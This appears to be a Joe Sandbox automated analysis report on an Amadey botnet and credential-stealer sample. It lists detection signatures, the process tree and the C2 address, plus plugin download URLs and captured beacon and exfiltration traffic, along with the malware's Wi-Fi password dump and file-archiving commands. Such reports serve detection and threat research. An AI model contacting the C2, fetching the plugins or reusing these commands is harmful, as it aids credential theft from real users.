Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wIaKimJFke.exe

Overview

General Information

Sample name:wIaKimJFke.exe
renamed because original name is a hash value
Original sample name:79fbd35cae4148d9053cd4590b6d41c0.exe
Analysis ID:1417243
MD5:79fbd35cae4148d9053cd4590b6d41c0
SHA1:3548d8fa1f242206447224068c16ffd30278ede3
SHA256:9c1751ba73fe53ed9385f24750212c6e785843e4c63dbafec8f95d3e6a5088ef
Tags:exe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wIaKimJFke.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\wIaKimJFke.exe" MD5: 79FBD35CAE4148D9053CD4590B6D41C0)
  • explorgu.exe (PID: 7488 cmdline: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe MD5: 79FBD35CAE4148D9053CD4590B6D41C0)
  • explorgu.exe (PID: 7888 cmdline: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe MD5: 79FBD35CAE4148D9053CD4590B6D41C0)
    • rundll32.exe (PID: 8072 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 8088 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)
        • netsh.exe (PID: 8112 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1308 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 5812 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["185.215.113.32/yandex/index.php"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      Click to see the 2 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      10.2.rundll32.exe.6e220000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        10.2.rundll32.exe.6e220000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                          0.2.wIaKimJFke.exe.4e0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            5.2.explorgu.exe.2a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                              1.2.explorgu.exe.2a0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8088, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1308, ProcessName: powershell.exe
                                Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8088, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1308, ProcessName: powershell.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8088, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 1308, ProcessName: powershell.exe

                                Stealing of Sensitive Information

                                barindex
                                Sigma detected: Capture Wi-Fi password
                                Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 8088, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 8112, ProcessName: netsh.exe

                                Snort Signatures

                                Timestamp:03/28/24-20:03:03.166034
                                SID:2856147
                                Source Port:49737
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/28/24-20:03:07.459174
                                SID:2856151
                                Source Port:49745
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:03/28/24-20:03:06.745507
                                SID:2855239
                                Source Port:49743
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus / Scanner detection for submitted sample
                                Source: wIaKimJFke.exeAvira: detected
                                Antivirus detection for URL or domain
                                Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                                Source: http://185.215.113.32/yandex/index.php%Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phprsionAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpKAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/Plugins/clip64.dll1Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpgAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpVlAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php2ab05Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpaAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php:10Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/Plugins/clip64.dll&Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/wsAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpa2ab05Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/Plugins/cred64.dllAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpWindowsAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php?wal=1rAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php?wal=1tesfAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/Plugins/clip64.dllAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpnAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phppAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php?wal=1&Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpa0Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.php?wal=1Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/Plugins/cred64.dll2Avira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpxAvira URL Cloud: Label: malware
                                Source: http://185.215.113.32/yandex/index.phpuAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllAvira: detection malicious, Label: TR/ClipBanker.rtyrx
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllAvira: detection malicious, Label: TR/ClipBanker.rtyrx
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllAvira: detection malicious, Label: TR/PSW.Agent.szlsq
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Found malware configuration
                                Source: 10.2.rundll32.exe.6e220000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": ["185.215.113.32/yandex/index.php"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllReversingLabs: Detection: 70%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeReversingLabs: Detection: 71%
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dllReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dllReversingLabs: Detection: 70%
                                Multi AV Scanner detection for submitted file
                                Source: wIaKimJFke.exeReversingLabs: Detection: 71%
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeJoe Sandbox ML: detected
                                Machine Learning detection for sample
                                Source: wIaKimJFke.exeJoe Sandbox ML: detected
                                Sample uses string decryption to hide its real strings
                                Source: 10.2.rundll32.exe.6e220000.0.unpackString decryptor: 185.215.113.32
                                Source: 10.2.rundll32.exe.6e220000.0.unpackString decryptor: /yandex/index.php
                                Source: wIaKimJFke.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,10_2_6E22BA2F
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 185.215.113.32:80
                                Source: TrafficSnort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49743 -> 185.215.113.32:80
                                Source: TrafficSnort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49745 -> 185.215.113.32:80
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.32 80Jump to behavior
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorIPs: 185.215.113.32
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 04 Feb 2024 16:00:19 GMTConnection: keep-aliveETag: "65bfb493-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 83 b2 bf 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 04 Feb 2024 16:00:18 GMTConnection: keep-aliveETag: "65bfb492-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a0 01 00 9c 00 00 00 bc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 f0 8e 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
                                Source: global trafficHTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Source: global trafficHTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
